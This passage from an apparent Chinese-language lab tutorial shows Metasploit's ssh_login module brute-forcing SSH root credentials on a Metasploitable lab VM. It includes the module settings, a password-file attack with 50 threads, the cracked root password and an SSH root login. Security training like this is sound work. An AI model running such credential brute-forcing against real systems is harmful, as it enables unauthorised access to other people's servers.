   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           false            yes       Whether to print output for all attempts

在终端中输入命令“set RHOST 192.168.22.134”,设置目标主机的IP地址。
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.22.134
rhosts => 192.168.22.134

在终端中输入“set USERNAME root”,指定登陆用户名root。
msf6 auxiliary(scanner/ssh/ssh_login) > set username root
username => root

在终端中输入“set PASS_FILE ”,设置暴力破解的密码文件路径。
msf6 auxiliary(scanner/ssh/ssh_login) > set pass_file root_userpass.txt
pass_file => root_userpass.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set userpass_file root_userpass.txt
userpass_file => root_userpass.txt

在终端中输入“set THREADS 50”,设置暴力破解的线程数为50。
msf6 auxiliary(scanner/ssh/ssh_login) > set threads 50
threads => 50

在终端中输入“run”, 开始向目标主机爆破ssh的登陆帐号和密码,登陆帐号为root,密码为gzt041057。
msf6 auxiliary(scanner/ssh/ssh_login) > run

[+] 192.168.22.134:22 - Success: 'root:gzt041057' 'uid=0(root) gid=0(root) groups=0(root) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 3 opened (192.168.22.137:45913 -> 192.168.22.134:22) at 2021-02-06 13:52:04 +0800
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

在终端中输入“ssh root@192.168.22.134”,连接目标主机。
msf6 auxiliary(scanner/ssh/ssh_login) > ssh root@192.168.22.134
[*] exec: ssh root@192.168.22.134

The authenticity of host '192.168.22.134 (192.168.22.134)' can't be established.
RSA key fingerprint is SHA256:BQHm5EoHX9GCiOLuVscegPXLQOsuPs+E9d/rrJB84rk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.22.134' (RSA) to the list of known hosts.
root@192.168.22.134's password: 
Last login: Fri Feb  5 23:51:57 2021 from :0.0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@metasploitable:~# 

本文标签: 靶机